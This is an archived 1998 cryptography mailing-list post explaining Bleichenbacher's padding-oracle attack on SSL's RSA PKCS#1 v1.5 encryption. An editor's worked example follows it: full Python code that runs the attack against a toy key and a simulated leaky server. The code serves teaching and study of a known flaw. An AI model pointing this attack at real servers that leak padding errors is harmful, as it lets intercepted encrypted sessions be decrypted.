[2882] in cryptography@c2.net mail archive
Re: Bleichenbacher's crack?
daemon@ATHENA.MIT.EDU (Anonymous)
Fri Jun 26 13:32:37 1998
Date: Fri, 26 Jun 1998 19:01:02 +0200
From: Anonymous <nobody@replay.com>
To: cryptography@c2.net

Bleichenbacher will be presenting his attack at Crypto 98 in August.
It is not a timing attack, but rather relies on the server leaking
information about the structure of a decrypted ciphertext. This is
of course a violation of standard cryptographic protocol design
principles, but is present in many SSL implementations.

The attack is based on sending fake RSA ciphertexts to an SSL server, and
determining from the error code returned by the server whether they
decrypted to a legal PKCS-1 formatted plaintext. Many SSL servers are
configured to return different errors depending on whether this is
true or not.

A PKCS-1 padded plaintext has a 0, a 2, n bytes of nonzero random padding,
a 0, and the payload, which in the case of SSL is a session key with
some version information. Some servers check the length of the payload
and the version data, some don't.

It does not take too many tries to find a random ciphertext which decrypts
to a plaintext which has this form.

Once this is done, Bleichenbacher makes additional probes based on this
initial ciphertext, learning whether modified versions also decrypt to
the PKCS-1 form. His idea for how to make use of this information
has not yet been published.

After about one million probes, he is able to recover the decryption
of a desired ciphertext (or, equivalently, the signature on a desired
message, but most servers do not use their decryption keys for signing).

Note that the attack does not recover the decryption key, but rather the
whole effort allows the decryption of one message. Most of the attack
would have to be done all over again to decrypt a different message.
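Worked example added by the editor; it is not part of the message above and not Bleichenbacher's own code. It runs the attack the post describes against a toy RSA key, with a PaddingOracle class standing in for the SSL server: the oracle decrypts whatever ciphertext it is handed and answers only whether the result was PKCS-1 conforming, in either the lenient form (prefix check only) or the strict form (length and version bytes checked too) that the post says different servers use. The search steps (blinding, then finding multipliers s whose modified ciphertexts the oracle accepts and narrowing the candidate interval for the plaintext) are those in the paper Bleichenbacher presented at CRYPTO '98, which this June 1998 post predates. The 128-bit key, the seed, the five-byte "premaster secret" (SSL 3.0 version bytes plus three filler bytes) and all function names are constructed for the example.

```python
"""Bleichenbacher's PKCS#1 v1.5 padding-oracle attack on a toy RSA key. The oracle
plays the SSL server from the post: it decrypts what it is sent and says only
"conforming" or not. Key, payload and seed are constructed for this example."""
import math
import random
from itertools import count


def is_probable_prime(n, rng, rounds=32):
    """Miller-Rabin for odd n > 3; plenty for a toy key."""
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x not in (1, n - 1) and not any((x := x * x % n) == n - 1 for _ in range(r - 1)):
            return False
    return True


def gen_key(bits, rng, e=65537):
    """Toy RSA key (n, e, d) of exactly `bits` bits; far too small for real use."""
    half = bits // 2
    while True:
        p, q = (rng.getrandbits(half) | 1 << (half - 1) | 1 for _ in range(2))
        n, phi = p * q, (p - 1) * (q - 1)
        if (p != q and n.bit_length() == bits and math.gcd(e, phi) == 1
                and is_probable_prime(p, rng) and is_probable_prime(q, rng)):
            return n, e, pow(e, -1, phi)


def pkcs1_pad(msg, k, rng):
    """PKCS#1 v1.5 type 2 block: 00 02 | >= 8 nonzero random bytes | 00 | msg."""
    assert len(msg) <= k - 11
    ps = bytes(rng.randrange(1, 256) for _ in range(k - 3 - len(msg)))
    return b"\x00\x02" + ps + b"\x00" + msg


class PaddingOracle:
    """The leaky server. Lenient: checks only the 00 02 prefix. Strict: also wants
    the 00 separator after >= 8 padding bytes, the expected payload length and the
    version bytes (the checks the post says some servers make). One bit leaks either way."""

    def __init__(self, n, d, k, strict=False, payload_len=5, version=b"\x03\x00"):
        self.n, self.d, self.k, self.strict = n, d, k, strict
        self.payload_len, self.version, self.queries = payload_len, version, 0

    def __call__(self, c):
        self.queries += 1
        m = pow(c, self.d, self.n).to_bytes(self.k, "big")
        if m[:2] != b"\x00\x02":
            return False
        sep = m.find(b"\x00", 2)
        return not self.strict or (sep >= 10 and len(m) - sep - 1 == self.payload_len
                                   and m[sep + 1:sep + 3] == self.version)


def bleichenbacher(n, e, c, k, oracle, rng):
    """Recover c^d mod n from oracle answers alone (d is never learned); steps as in the paper."""
    B = 1 << (8 * (k - 2))                 # conforming  <=>  2B <= (c s^e)^d mod n < 3B
    ceil = lambda x, y: -(-x // y)
    s0 = 1                                 # Step 1, blinding: s0 = 1 already works for a
    while not oracle(c * pow(s0, e, n) % n):   # captured ClientKeyExchange; an arbitrary c
        s0 = rng.randrange(2, n)           # (a value to be "signed") needs a random s0
    c0 = c * pow(s0, e, n) % n
    conforming = lambda s: oracle(c0 * pow(s, e, n) % n)
    M = [(2 * B, 3 * B - 1)]               # all that is known about m0 = m * s0 mod n
    s = next(t for t in count(ceil(n, 3 * B)) if conforming(t))        # Step 2a
    while True:
        # Step 3: conforming s means 2B <= m0*s - r*n < 3B for some r; intersect with M
        M = sorted({(max(a, ceil(2 * B + r * n, s)), min(b, (3 * B - 1 + r * n) // s))
                    for a, b in M
                    for r in range(ceil(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1)})
        M = [(lo, hi) for lo, hi in M if lo <= hi]
        if len(M) == 1 and M[0][0] == M[0][1]:                          # Step 4
            return M[0][0] * pow(s0, -1, n) % n                         # undo blinding
        if len(M) > 1:                                                  # Step 2b
            s = next(t for t in count(s + 1) if conforming(t))
        else:                                                           # Step 2c
            a, b = M[0]
            s = next(t for r in count(ceil(2 * (b * s - 2 * B), n))
                     for t in range(ceil(2 * B + r * n, b), (3 * B - 1 + r * n) // a + 1)
                     if conforming(t))


def demo(seed=1998, k=16):
    """Toy key, constructed premaster secret (SSL 3.0 version bytes + 'key'), a full
    attack through the lenient oracle, and both servers' verdicts on a wrong-length block."""
    rng = random.Random(seed)
    n, e, d = gen_key(8 * k, rng)
    secret = b"\x03\x00key"
    m = int.from_bytes(pkcs1_pad(secret, k, rng), "big")
    lenient = PaddingOracle(n, d, k)
    recovered = bleichenbacher(n, e, pow(m, e, n), k, lenient, rng)
    strict = PaddingOracle(n, d, k, strict=True, payload_len=len(secret))
    short = pow(int.from_bytes(pkcs1_pad(b"\x03\x00", k, rng), "big"), e, n)
    return {"plaintext": m, "recovered": recovered, "queries": lenient.queries,
            "strict_real": strict(pow(m, e, n)), "strict_short": strict(short),
            "lenient_short": lenient(short)}
```

Calling demo() generates the key, encrypts the padded secret as a client would, and hands the ciphertext plus the lenient oracle to bleichenbacher(), which returns the whole padded block without ever seeing d; "queries" is the number of probes that took. Most of them go into step 2a, because a modified ciphertext decrypts to something in the 00 02 range only about once in n/B (roughly 2^16) tries, which is the "not too many tries" of the post; the post's million-probe figure is for real key sizes. The strict oracle still accepts the genuine ciphertext and rejects the wrong-length block, so it leaks the same bit, only on fewer of the attacker's probes. Note that the output is one decrypted block, not the key: a second ciphertext means starting over, as the post says.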